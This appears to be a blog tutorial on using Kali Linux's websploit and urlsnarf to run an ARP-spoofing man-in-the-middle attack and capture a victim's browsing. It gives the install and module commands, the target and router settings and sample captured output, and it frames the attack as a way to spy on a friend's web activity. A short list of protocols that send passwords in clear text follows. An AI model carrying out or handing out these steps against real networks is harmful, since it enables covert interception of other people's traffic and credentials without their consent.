Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool.
Urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by almost all web servers), suitable for offline post-processing with your favorite web log analysis tool (analog, wwwstat, etc.).
URLSnarf - Kali Linux Tool used to Sniffing in Network
MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.
Step 1: Need to install websploit in kali if not present.
root@kali:~# apt-get install websploit
Step 2: To Run the websploit
Step 3: Next we need to list the modules with the websploit.
wsf > show modules
Step 4: Need to select network/mitm under Network modules.
wsf > use network/mitm
wsf:MITM > show options
Interface: Need to specify network adapter interface based on our network adapter.
set Interface eth0
set Interface wlan0
Router: Need to specify Router IP, can be found with the command route -n.
set Router (Gateway IP)
Target: Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.
Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occurs after that sniffers will startup.
wsf:MITM > run
Step 6: Now go down to victim machine and start surfing, all the images would be captured by urlsnarf.
URLSnarf – Tool used to capture website links that your friend looking Online
url snarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]
akash@hackersTreeHouse:~$ sudo urlsnarf -i eth0 -v -p cap.pcap
url snarf: using cap.pcap [tcp port 80 or port 8080 or port 3128]
192.168.1.18 - - [16/Nov/2015:15:10:38 +0530] "GET http://192.168.1.6/img/for HTTP/1.1" - - "http://192.168.1.6/img/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
rc = -1
pcap_read_ex(): bogus savefile header
Protocols Vulnerable for Sniffing
HTTP: Sends passwords in clear text
TELNET: Transfer commands in plain text
SNMP: Sends passwords in clear text
POP: Sends passwords in clear text
FTP: Sends passwords in clear text
NNTP: Sends passwords in clear text
IMAP: Sends passwords in clear text
Here is Video Tutorial:
If you any doubt please don’t hesitate to leave a comment.